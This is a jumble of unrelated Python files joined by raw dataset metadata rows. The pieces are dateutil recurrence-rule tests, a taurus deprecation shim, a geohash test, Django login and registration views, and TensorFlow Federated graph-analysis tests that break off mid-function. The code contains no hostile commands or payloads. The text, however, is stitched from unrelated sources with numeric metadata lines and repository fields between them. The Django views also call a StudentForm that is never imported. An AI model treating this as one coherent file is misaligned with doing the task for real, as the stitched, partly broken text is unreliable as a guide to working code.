datetime(2004, 3, 10, 9, 0),
datetime(2004, 5, 10, 9, 0)])
def testSetDateAndExDate(self):
rrset = rruleset()
rrset.rdate(datetime(1997, 9, 2, 9))
rrset.rdate(datetime(1997, 9, 4, 9))
rrset.rdate(datetime(1997, 9, 9, 9))
rrset.rdate(datetime(1997, 9, 11, 9))
rrset.rdate(datetime(1997, 9, 16, 9))
rrset.rdate(datetime(1997, 9, 18, 9))
rrset.exdate(datetime(1997, 9, 4, 9))
rrset.exdate(datetime(1997, 9, 11, 9))
rrset.exdate(datetime(1997, 9, 18, 9))
self.assertEqual(list(rrset),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testSetDateAndExRule(self):
rrset = rruleset()
rrset.rdate(datetime(1997, 9, 2, 9))
rrset.rdate(datetime(1997, 9, 4, 9))
rrset.rdate(datetime(1997, 9, 9, 9))
rrset.rdate(datetime(1997, 9, 11, 9))
rrset.rdate(datetime(1997, 9, 16, 9))
rrset.rdate(datetime(1997, 9, 18, 9))
rrset.exrule(rrule(YEARLY, count=3, byweekday=TH,
dtstart=datetime(1997, 9, 2, 9, 0)))
self.assertEqual(list(rrset),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testSetCount(self):
rrset = rruleset()
rrset.rrule(rrule(YEARLY, count=6, byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
rrset.exrule(rrule(YEARLY, count=3, byweekday=TH,
dtstart=datetime(1997, 9, 2, 9, 0)))
self.assertEqual(rrset.count(), 3)
def testSetCachePre(self):
rrset = rruleset()
rrset.rrule(rrule(YEARLY, count=2, byweekday=TU,
dtstart=datetime(1997, 9, 2, 9, 0)))
rrset.rrule(rrule(YEARLY, count=1, byweekday=TH,
dtstart=datetime(1997, 9, 2, 9, 0)))
self.assertEqual(list(rrset),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testSetCachePost(self):
rrset = rruleset(cache=True)
rrset.rrule(rrule(YEARLY, count=2, byweekday=TU,
dtstart=datetime(1997, 9, 2, 9, 0)))
rrset.rrule(rrule(YEARLY, count=1, byweekday=TH,
dtstart=datetime(1997, 9, 2, 9, 0)))
for x in rrset: pass
self.assertEqual(list(rrset),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testSetCachePostInternal(self):
rrset = rruleset(cache=True)
rrset.rrule(rrule(YEARLY, count=2, byweekday=TU,
dtstart=datetime(1997, 9, 2, 9, 0)))
rrset.rrule(rrule(YEARLY, count=1, byweekday=TH,
dtstart=datetime(1997, 9, 2, 9, 0)))
for x in rrset: pass
self.assertEqual(list(rrset._cache),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testSetRRuleCount(self):
# Test that the count is updated when an rrule is added
rrset = rruleset(cache=False)
for cache in (True, False):
rrset = rruleset(cache=cache)
rrset.rrule(rrule(YEARLY, count=2, byweekday=TH,
dtstart=datetime(1983, 4, 1)))
rrset.rrule(rrule(WEEKLY, count=4, byweekday=FR,
dtstart=datetime(1991, 6, 3)))
# Check the length twice - first one sets a cache, second reads it
self.assertEqual(rrset.count(), 6)
self.assertEqual(rrset.count(), 6)
# This should invalidate the cache and force an update
rrset.rrule(rrule(MONTHLY, count=3, dtstart=datetime(1994, 1, 3)))
self.assertEqual(rrset.count(), 9)
self.assertEqual(rrset.count(), 9)
def testSetRDateCount(self):
# Test that the count is updated when an rdate is added
rrset = rruleset(cache=False)
for cache in (True, False):
rrset = rruleset(cache=cache)
rrset.rrule(rrule(YEARLY, count=2, byweekday=TH,
dtstart=datetime(1983, 4, 1)))
rrset.rrule(rrule(WEEKLY, count=4, byweekday=FR,
dtstart=datetime(1991, 6, 3)))
# Check the length twice - first one sets a cache, second reads it
self.assertEqual(rrset.count(), 6)
self.assertEqual(rrset.count(), 6)
# This should invalidate the cache and force an update
rrset.rdate(datetime(1993, 2, 14))
self.assertEqual(rrset.count(), 7)
self.assertEqual(rrset.count(), 7)
def testSetExRuleCount(self):
# Test that the count is updated when an exrule is added
rrset = rruleset(cache=False)
for cache in (True, False):
rrset = rruleset(cache=cache)
rrset.rrule(rrule(YEARLY, count=2, byweekday=TH,
dtstart=datetime(1983, 4, 1)))
rrset.rrule(rrule(WEEKLY, count=4, byweekday=FR,
dtstart=datetime(1991, 6, 3)))
# Check the length twice - first one sets a cache, second reads it
self.assertEqual(rrset.count(), 6)
self.assertEqual(rrset.count(), 6)
# This should invalidate the cache and force an update
rrset.exrule(rrule(WEEKLY, count=2, interval=2,
dtstart=datetime(1991, 6, 14)))
self.assertEqual(rrset.count(), 4)
self.assertEqual(rrset.count(), 4)
def testSetExDateCount(self):
# Test that the count is updated when an rdate is added
for cache in (True, False):
rrset = rruleset(cache=cache)
rrset.rrule(rrule(YEARLY, count=2, byweekday=TH,
dtstart=datetime(1983, 4, 1)))
rrset.rrule(rrule(WEEKLY, count=4, byweekday=FR,
dtstart=datetime(1991, 6, 3)))
# Check the length twice - first one sets a cache, second reads it
self.assertEqual(rrset.count(), 6)
self.assertEqual(rrset.count(), 6)
# This should invalidate the cache and force an update
rrset.exdate(datetime(1991, 6, 28))
self.assertEqual(rrset.count(), 5)
self.assertEqual(rrset.count(), 5)
class WeekdayTest(unittest.TestCase):
def testInvalidNthWeekday(self):
with self.assertRaises(ValueError):
FR(0)
def testWeekdayCallable(self):
# Calling a weekday instance generates a new weekday instance with the
# value of n changed.
from dateutil.rrule import weekday
self.assertEqual(MO(1), weekday(0, 1))
# Calling a weekday instance with the identical n returns the original
# object
FR_3 = weekday(4, 3)
self.assertIs(FR_3(3), FR_3)
def testWeekdayEquality(self):
# Two weekday objects are not equal if they have different values for n
self.assertNotEqual(TH, TH(-1))
self.assertNotEqual(SA(3), SA(2))
def testWeekdayEqualitySubclass(self):
# Two weekday objects equal if their "weekday" and "n" attributes are
# available and the same
class BasicWeekday(object):
def __init__(self, weekday):
self.weekday = weekday
class BasicNWeekday(BasicWeekday):
def __init__(self, weekday, n=None):
super(BasicNWeekday, self).__init__(weekday)
self.n = n
MO_Basic = BasicWeekday(0)
self.assertNotEqual(MO, MO_Basic)
self.assertNotEqual(MO(1), MO_Basic)
TU_BasicN = BasicNWeekday(1)
self.assertEqual(TU, TU_BasicN)
self.assertNotEqual(TU(3), TU_BasicN)
WE_Basic3 = BasicNWeekday(2, 3)
self.assertEqual(WE(3), WE_Basic3)
self.assertNotEqual(WE(2), WE_Basic3)
def testWeekdayReprNoN(self):
no_n_reprs = ('MO', 'TU', 'WE', 'TH', 'FR', 'SA', 'SU')
no_n_wdays = (MO, TU, WE, TH, FR, SA, SU)
for repstr, wday in zip(no_n_reprs, no_n_wdays):
self.assertEqual(repr(wday), repstr)
def testWeekdayReprWithN(self):
with_n_reprs = ('WE(+1)', 'TH(-2)', 'SU(+3)')
with_n_wdays = (WE(1), TH(-2), SU(+3))
for repstr, wday in zip(with_n_reprs, with_n_wdays):
self.assertEqual(repr(wday), repstr)
| 44.224968 | 93 | 0.403647 | 19,368 | 209,361 | 4.323678 | 0.045746 | 0.155336 | 0.151049 | 0.124384 | 0.794533 | 0.78375 | 0.775558 | 0.763867 | 0.75595 | 0.72772 | 0 | 0.148656 | 0.48745 | 209,361 | 4,733 | 94 | 44.234312 | 0.631724 | 0.019421 | 0 | 0.784989 | 0 | 0 | 0.010167 | 0.009372 | 0 | 0 | 0 | 0 | 0.085212 | 1 | 0.136735 | false | 0.001239 | 0.001734 | 0 | 0.139708 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a677e7f3401aa80caaca1775ad232449da53402 | 218 | py | Python | lib/taurus/core/tango/search.py | MikeFalowski/taurus | ef041bf35dd847caf08a7efbe072f4020d35522e | [
"CC-BY-3.0"
] | null | null | null | lib/taurus/core/tango/search.py | MikeFalowski/taurus | ef041bf35dd847caf08a7efbe072f4020d35522e | [
"CC-BY-3.0"
] | 1 | 2020-02-28T16:36:04.000Z | 2020-03-02T07:51:12.000Z | lib/taurus/core/tango/search.py | MikeFalowski/taurus | ef041bf35dd847caf08a7efbe072f4020d35522e | [
"CC-BY-3.0"
] | null | null | null | from taurus.core.util.log import deprecated as __deprecated
__deprecated(dep='taurus.core.tango.search',
alt='taurus.core.util.fandango_search', rel='4.1.2')
from taurus.core.util.fandango_search import *
| 31.142857 | 63 | 0.752294 | 32 | 218 | 4.9375 | 0.53125 | 0.253165 | 0.265823 | 0.227848 | 0.35443 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015625 | 0.119266 | 218 | 6 | 64 | 36.333333 | 0.807292 | 0 | 0 | 0 | 0 | 0 | 0.279817 | 0.256881 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8a94522587fcf0ca0e647a4f4af364134b34c4a2 | 209 | py | Python | tests/test_geohash.py | Marcnuth/geohash | 1a1bc20c0d8e793eec513dcae44ed29f301da9f5 | [
"Apache-2.0"
] | 2 | 2019-08-21T01:42:51.000Z | 2022-03-26T09:15:45.000Z | tests/test_geohash.py | Marcnuth/geohash | 1a1bc20c0d8e793eec513dcae44ed29f301da9f5 | [
"Apache-2.0"
] | null | null | null | tests/test_geohash.py | Marcnuth/geohash | 1a1bc20c0d8e793eec513dcae44ed29f301da9f5 | [
"Apache-2.0"
] | 1 | 2020-02-10T08:58:24.000Z | 2020-02-10T08:58:24.000Z | from geohash import geohash
def test_hash():
print(geohash.encode(36, -129, precision=9))
print(geohash.encode2bin(36, -129))
print(geohash.decode('9nkkb9954'))
print(geohash.decode('x1d'))
| 20.9 | 48 | 0.688995 | 27 | 209 | 5.296296 | 0.592593 | 0.335664 | 0.251748 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101695 | 0.15311 | 209 | 9 | 49 | 23.222222 | 0.706215 | 0 | 0 | 0 | 0 | 0 | 0.057416 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.166667 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
76e3521bbd27b8ab338b32be3a676aad574117b4 | 50 | py | Python | codes/utils/__init__.py | jecalles/genetic-codes | ba5bdecf28663a5e6cee77c224e53c02e5ef06d9 | [
"MIT"
] | null | null | null | codes/utils/__init__.py | jecalles/genetic-codes | ba5bdecf28663a5e6cee77c224e53c02e5ef06d9 | [
"MIT"
] | null | null | null | codes/utils/__init__.py | jecalles/genetic-codes | ba5bdecf28663a5e6cee77c224e53c02e5ef06d9 | [
"MIT"
] | null | null | null | from . import definitions
from . import functions
| 16.666667 | 25 | 0.8 | 6 | 50 | 6.666667 | 0.666667 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 50 | 2 | 26 | 25 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0a068d209a038a39a65f564e930e187b8f2e7fc8 | 12,521 | py | Python | backend/account/views.py | CS178A-B/final-project-bjls | aebb8042f2d958caac00e31b27b445b9079901d0 | [
"MIT"
] | null | null | null | backend/account/views.py | CS178A-B/final-project-bjls | aebb8042f2d958caac00e31b27b445b9079901d0 | [
"MIT"
] | 20 | 2020-10-21T19:16:15.000Z | 2021-09-03T05:48:20.000Z | backend/account/views.py | CS178A-B/R-Finder | aebb8042f2d958caac00e31b27b445b9079901d0 | [
"MIT"
] | 1 | 2020-10-22T04:49:45.000Z | 2020-10-22T04:49:45.000Z | from django.shortcuts import render, redirect, reverse
from django.contrib.auth import login, logout
from django.http import HttpResponse, JsonResponse
from django.views import View
from django.contrib.auth.mixins import LoginRequiredMixin
from dateutil.relativedelta import relativedelta
from .forms import LoginForm
from .models import User
# from .forms import LoginForm, StudentUpdateForm, StudentForm
from django.contrib import messages
from django.utils import timezone
import logging
import os
import json
import datetime
import calendar
from datetime import datetime, date
logging.basicConfig(level=os.environ.get("LOGLEVEL", "DEBUG"))
logger = logging.getLogger(__name__)
class LoginView(View):
"""This how the login page is handled when attempting GET and POST requests
"""
template_name = "account/login.html"
# If a user is logged in, they have no need to access the login page, so we redirect them to their dashboard page
# Otherwise, if they aren't logged in, access to the login page allows them to do so
def get(self, request):
if request.user.is_authenticated:
# validC = validPayingCustomer(request)
# if not validC:
# return redirect(reverse('account:payment'))
return redirect(reverse('account:dashboard'))
login_form = LoginForm()
return render(request, self.template_name, {'form': login_form})
# When a user submits the fields on the login page, we want to ensure that the login credentials are correct
# If they are, we redirect them to their dashboard page
# If they aren't, we render the login page again, this time with an error message
def post(self, request):
login_form = LoginForm(request, data=request.POST)
if login_form.is_valid():
login(request, login_form.get_user())
# validC = validPayingCustomer(request)
# if not validC:
# return redirect(reverse('account:payment'))
# else:
return redirect(reverse('account:dashboard'))
messages.error(request, "Your email or password is incorrect.")
return render(request, self.template_name, {'form': login_form})
class RegisterStudentView(View):
"""This how the register page is handled when attempting GET and POST requests
"""
template_name = "account/register.html"
model = User
# If a user is logged in, they should not have access to the registration page, so we redirect them to their dashboard
# If a user is not logged in, they should not have access to the registration page, so we redirect them to the login page
# If a user is a superuser, they are the ONLY people that should be able to access the registration page, so we render the page and form for them
def get(self, request):
student_form = StudentForm()
if request.user.is_authenticated:
# is_SuperUser = request.user.is_superuser
# if is_SuperUser:
return redirect(reverse('account:dashboard'))
return render(request, self.template_name, {'form': student_form})
# When a user submits the fields on the login page, we want to ensure that the registration credentials are correct
# If they are, we redirect them to their dashboard page
# If they aren't, we render the registration page again, this time with an error message
def post(self, request):
student_form = StudentForm(request.POST)
if student_form.is_valid():
student_form.instance.username = student_form.instance.email
student_form.instance.is_student = True
# customer_form.instance.billing_start_date = self.getBillingStart()
student_form.save()
return redirect(reverse('account:login'))
return render(request, self.template_name, {'form': student_form})
# def getBillingStart(self):
# today = datetime.today()
# firstThis = today.replace(day=1)
# firstNext = firstThis + relativedelta(months=+1)
# return firstNext
# class RegisterFacultyView(View):
# """This how the register page is handled when attempting GET and POST requests
# """
# template_name = "account/register.html"
# # If a user is logged in, they should not have access to the registration page, so we redirect them to their dashboard
# # If a user is not logged in, they should not have access to the registration page, so we redirect them to the login page
# # If a user is a superuser, they are the ONLY people that should be able to access the registration page, so we render the page and form for them
# def get(self, request):
# faculty_form = FacultyForm()
# if request.user.is_authenticated:
# # is_SuperUser = request.user.is_superuser
# # if is_SuperUser:
# return redirect(reverse('account:dashboard'))
# return render(request, self.template_name, {'form': faculty_form})
# # When a user submits the fields on the login page, we want to ensure that the registration credentials are correct
# # If they are, we redirect them to their dashboard page
# # If they aren't, we render the registration page again, this time with an error message
# def post(self, request):
# faculty_form = FacultyForm(request.POST)
# if faculty_form.is_valid():
# faculty_form.instance.username = faculty_form.instance.email
# faculty_form.instance.is_faculty = True
# # customer_form.instance.billing_start_date = self.getBillingStart()
# faculty_form.save()
# return redirect(reverse('account:login'))
# return render(request, self.template_name, {'form': faculty_form})
class DashboardView(View):
"""This how the dashboard page is handled when attempting GET requests
"""
template_name = "account/dashboard.html"
# If a user is logged in, they should have access to their dashboard page, so we render their dashboard
# If a user is not logged in, they should not have access to the dashboard page, so we redirect them to the login page
def get(self, request):
if request.user.is_authenticated:
# validC = validPayingCustomer(request)
# if not validC:
# return redirect(reverse('account:payment'))
# print(request.user.billing_start_date)
return render(request, self.template_name)
else:
return redirect(reverse('account:login'))
class JobBoardView(View):
"""This how the job board page is handled when attempting GET requests
"""
template_name = "account/JobBoard.html"
# If a user is logged in, they should have access to their dashboard page, so we render their dashboard
# If a user is not logged in, they should not have access to the dashboard page, so we redirect them to the login page
def get(self, request):
# if request.user.is_authenticated:
# # validC = validPayingCustomer(request)
# # if not validC:
# # return redirect(reverse('account:payment'))
# # print(request.user.billing_start_date)
# return render(request, self.template_name)
# else:
# return redirect(reverse('account:login'))
return render(request, self.template_name)
class SettingsView(View):
"""This how the settings page is handled when attempting GET requests
"""
template_name = "account/settings.html"
# If a user is logged in, they should have access to their settings page, so we render their account settings
# If a user is not logged in, they should not have access to the settings page, so we redirect them to the login page
def get(self, request):
if request.user.is_authenticated:
# validC = validPayingCustomer(request)
# if not validC:
# return redirect(reverse('account:payment'))
return render(request, self.template_name)
return redirect(reverse('account:login'))
# class StudentUpdateView(View):
# """This how the update page is handled when attempting GET and POST requests
# """
# template_name = "account/update_account.html"
# # If a user is logged in, they should be able to access the update account page, so we render the update page and its form
# # Otherwise, if they aren't logged in, they should not have access to the update account page, so we redirect them to the login page
# def get(self, request):
# update_form = StudentUpdateForm()
# if request.user.is_authenticated:
# # validC = validPayingCustomer(request)
# # if not validC:
# # return redirect(reverse('account:payment'))
# return render(request, self.template_name, {'form': update_form})
# return redirect(reverse('account:login'))
# # When a user submits the fields on the update account page, we want to ensure that the update credentials are correct
# # If they are, we save the changes and redirect them to their dashboard page
# # If they aren't, we render the update account page again, this time with an error message
# def post(self, request):
# update_form = StudentUpdateForm(request.POST, instance=request.user)
# if update_form.is_valid():
# update_form.instance.username = update_form.instance.email
# update_form.save()
# return redirect(reverse('account:dashboard'))
# return render(request, self.template_name, {'form': update_form})
# class FacultyUpdateView(View):
# """This how the update page is handled when attempting GET and POST requests
# """
# template_name = "account/update_account.html"
# # If a user is logged in, they should be able to access the update account page, so we render the update page and its form
# # Otherwise, if they aren't logged in, they should not have access to the update account page, so we redirect them to the login page
# def get(self, request):
# update_form = FacultyUpdateForm()
# if request.user.is_authenticated:
# # validC = validPayingCustomer(request)
# # if not validC:
# # return redirect(reverse('account:payment'))
# return render(request, self.template_name, {'form': update_form})
# return redirect(reverse('account:login'))
# # When a user submits the fields on the update account page, we want to ensure that the update credentials are correct
# # If they are, we save the changes and redirect them to their dashboard page
# # If they aren't, we render the update account page again, this time with an error message
# def post(self, request):
# update_form = StudentUpdateForm(request.POST, instance=request.user)
# if update_form.is_valid():
# update_form.instance.username = update_form.instance.email
# update_form.save()
# return redirect(reverse('account:dashboard'))
# return render(request, self.template_name, {'form': update_form})
class DeleteView(View):
"""This how the delete page is handled when attempting GET and POST requests
"""
template_name = "account/delete_account.html"
# If a user is logged in, they should be able to access the delete account page, so we render the delete page
# Otherwise, if they aren't logged in, they should not have access to the delete account page, so we redirect them to the login page
def get(self, request):
if request.user.is_authenticated:
return render(request, self.template_name)
return redirect(reverse('account:login'))
# If a user submits the delete button, sending a delete POST request, the account should be deleted
def post(self, request):
u = request.user
u.delete()
return redirect(reverse('account:login'))
class IndexView(View):
"""This was the placeholder for index.html before replacing the dashboard I created
"""
template_name = "account/index.html"
def get(self, request):
if request.user.is_authenticated:
# validC = validPayingCustomer(request)
# if not validC:
# return redirect(reverse('account:payment'))
return render(request, self.template_name)
return redirect(reverse('account:login'))
| 47.249057 | 151 | 0.678939 | 1,648 | 12,521 | 5.093447 | 0.103762 | 0.020014 | 0.060043 | 0.080057 | 0.794139 | 0.770789 | 0.760782 | 0.760782 | 0.749226 | 0.719919 | 0 | 0.000211 | 0.241434 | 12,521 | 264 | 152 | 47.42803 | 0.883554 | 0.671911 | 0 | 0.419753 | 0 | 0 | 0.087356 | 0.028608 | 0 | 0 | 0 | 0 | 0 | 1 | 0.123457 | false | 0.012346 | 0.197531 | 0.012346 | 0.728395 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
0a1083518e6c3ea618ef3ee09ebb2dce5938c0c6 | 22 | py | Python | learning/opengl/3_testing.py | Nephrin/Tut | 9454be28fd37c155d0b4e97876196f8d33ccf8e5 | [
"Apache-2.0"
] | 2 | 2019-06-23T07:17:30.000Z | 2019-07-06T15:15:42.000Z | learning/opengl/3_testing.py | Nephrin/Tut | 9454be28fd37c155d0b4e97876196f8d33ccf8e5 | [
"Apache-2.0"
] | null | null | null | learning/opengl/3_testing.py | Nephrin/Tut | 9454be28fd37c155d0b4e97876196f8d33ccf8e5 | [
"Apache-2.0"
] | 1 | 2019-06-23T07:17:43.000Z | 2019-06-23T07:17:43.000Z | from graphics import * | 22 | 22 | 0.818182 | 3 | 22 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 22 | 1 | 22 | 22 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0a21f9a488407981bd2ff302cf0a76e8c3ae2ea4 | 59 | py | Python | magda/module/interface.py | p-mielniczuk/magda | 6359fa5721b4e27bd98f2c6af0e858b476645618 | [
"Apache-2.0"
] | 8 | 2021-02-25T14:00:25.000Z | 2022-03-10T00:32:43.000Z | magda/module/interface.py | p-mielniczuk/magda | 6359fa5721b4e27bd98f2c6af0e858b476645618 | [
"Apache-2.0"
] | 22 | 2021-03-24T11:56:47.000Z | 2021-11-02T15:09:50.000Z | magda/module/interface.py | p-mielniczuk/magda | 6359fa5721b4e27bd98f2c6af0e858b476645618 | [
"Apache-2.0"
] | 6 | 2021-04-06T07:26:47.000Z | 2021-12-07T18:55:52.000Z | from abc import ABC
class ModuleInterface(ABC):
pass
| 9.833333 | 27 | 0.728814 | 8 | 59 | 5.375 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.220339 | 59 | 5 | 28 | 11.8 | 0.934783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
0a22dd6fece159c6b35aeb72671d4cef9324dc52 | 9,607 | py | Python | tensorflow_federated/python/core/impl/compiler/building_block_analysis_test.py | j35tor/federated | d92bfa6b8e3c9ebbac51ff7a3a180c2baaa08730 | [
"Apache-2.0"
] | 1 | 2021-04-01T08:35:06.000Z | 2021-04-01T08:35:06.000Z | tensorflow_federated/python/core/impl/compiler/building_block_analysis_test.py | j35tor/federated | d92bfa6b8e3c9ebbac51ff7a3a180c2baaa08730 | [
"Apache-2.0"
] | null | null | null | tensorflow_federated/python/core/impl/compiler/building_block_analysis_test.py | j35tor/federated | d92bfa6b8e3c9ebbac51ff7a3a180c2baaa08730 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl.testing import absltest
import tensorflow as tf
from tensorflow_federated.proto.v0 import computation_pb2 as pb
from tensorflow_federated.python.common_libs import serialization_utils
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.api import computations
from tensorflow_federated.python.core.impl.compiler import building_block_analysis
from tensorflow_federated.python.core.impl.compiler import building_blocks
from tensorflow_federated.python.core.impl.types import type_serialization
from tensorflow_federated.python.core.impl.utils import tensorflow_utils
class CountTensorFlowOpsTest(absltest.TestCase):
def test_raises_on_none(self):
with self.assertRaises(TypeError):
building_block_analysis.count_tensorflow_ops_in(None)
def test_raises_on_reference(self):
ref = building_blocks.Reference('x', tf.int32)
with self.assertRaises(ValueError):
building_block_analysis.count_tensorflow_ops_in(ref)
def test_counts_correct_number_of_ops_simple_case(self):
with tf.Graph().as_default() as g:
a = tf.constant(0)
b = tf.constant(1)
c = a + b
_, result_binding = tensorflow_utils.capture_result_from_graph(c, g)
packed_graph_def = serialization_utils.pack_graph_def(g.as_graph_def())
function_type = computation_types.FunctionType(None, tf.int32)
proto = pb.Computation(
type=type_serialization.serialize_type(function_type),
tensorflow=pb.TensorFlow(
graph_def=packed_graph_def, parameter=None, result=result_binding))
building_block = building_blocks.ComputationBuildingBlock.from_proto(proto)
tf_ops_in_graph = building_block_analysis.count_tensorflow_ops_in(
building_block)
self.assertEqual(tf_ops_in_graph, 3)
def test_counts_correct_number_of_ops_swith_function(self):
@computations.tf_computation(
computation_types.TensorType(tf.int32, shape=[]))
def foo(x):
@tf.function
def bar(x):
return x + 1
return bar(bar(x))
building_block = foo.to_building_block()
tf_ops_in_graph = building_block_analysis.count_tensorflow_ops_in(
building_block)
self.assertEqual(tf_ops_in_graph, 6)
class CountTensorFlowVariablesTest(absltest.TestCase):
def test_raises_on_none(self):
with self.assertRaises(TypeError):
building_block_analysis.count_tensorflow_variables_in(None)
def test_counts_no_variables(self):
with tf.Graph().as_default() as g:
a = tf.constant(0)
b = tf.constant(1)
c = a + b
_, result_binding = tensorflow_utils.capture_result_from_graph(c, g)
packed_graph_def = serialization_utils.pack_graph_def(g.as_graph_def())
function_type = computation_types.FunctionType(None, tf.int32)
proto = pb.Computation(
type=type_serialization.serialize_type(function_type),
tensorflow=pb.TensorFlow(
graph_def=packed_graph_def, parameter=None, result=result_binding))
building_block = building_blocks.ComputationBuildingBlock.from_proto(proto)
tf_vars_in_graph = building_block_analysis.count_tensorflow_variables_in(
building_block)
self.assertEqual(tf_vars_in_graph, 0)
def test_avoids_misdirection_with_name(self):
with tf.Graph().as_default() as g:
a = tf.constant(0, name='variable1')
b = tf.constant(1, name='variable2')
c = a + b
_, result_binding = tensorflow_utils.capture_result_from_graph(c, g)
packed_graph_def = serialization_utils.pack_graph_def(g.as_graph_def())
function_type = computation_types.FunctionType(None, tf.int32)
proto = pb.Computation(
type=type_serialization.serialize_type(function_type),
tensorflow=pb.TensorFlow(
graph_def=packed_graph_def, parameter=None, result=result_binding))
building_block = building_blocks.ComputationBuildingBlock.from_proto(proto)
tf_vars_in_graph = building_block_analysis.count_tensorflow_variables_in(
building_block)
self.assertEqual(tf_vars_in_graph, 0)
def test_counts_two_variables_correctly(self):
with tf.Graph().as_default() as g:
a = tf.Variable(0, name='variable1')
b = tf.Variable(1, name='variable2')
c = a + b
_, result_binding = tensorflow_utils.capture_result_from_graph(c, g)
packed_graph_def = serialization_utils.pack_graph_def(g.as_graph_def())
function_type = computation_types.FunctionType(None, tf.int32)
proto = pb.Computation(
type=type_serialization.serialize_type(function_type),
tensorflow=pb.TensorFlow(
graph_def=packed_graph_def, parameter=None, result=result_binding))
building_block = building_blocks.ComputationBuildingBlock.from_proto(proto)
tf_vars_in_graph = building_block_analysis.count_tensorflow_variables_in(
building_block)
self.assertEqual(tf_vars_in_graph, 2)
def test_counts_correct_variables_with_function(self):
@computations.tf_computation(tf.int32)
def foo(x):
y = tf.Variable(initial_value=0)
@tf.function
def bar(x):
y.assign_add(1)
return x + y, tf.shape(y)
z = bar(x)
return bar(z[0])
building_block = foo.to_building_block()
tf_vars_in_graph = building_block_analysis.count_tensorflow_variables_in(
building_block)
self.assertEqual(tf_vars_in_graph, 1)
class GetDevicePlacementInTest(absltest.TestCase):
def test_raises_with_reference(self):
ref = building_blocks.Reference('x', tf.int32)
with self.assertRaisesRegex(ValueError, 'tensorflow'):
building_block_analysis.get_device_placement_in(ref)
def test_gets_none_placement(self):
with tf.Graph().as_default() as g:
a = tf.Variable(0, name='variable1')
b = tf.Variable(1, name='variable2')
c = a + b
_, result_binding = tensorflow_utils.capture_result_from_graph(c, g)
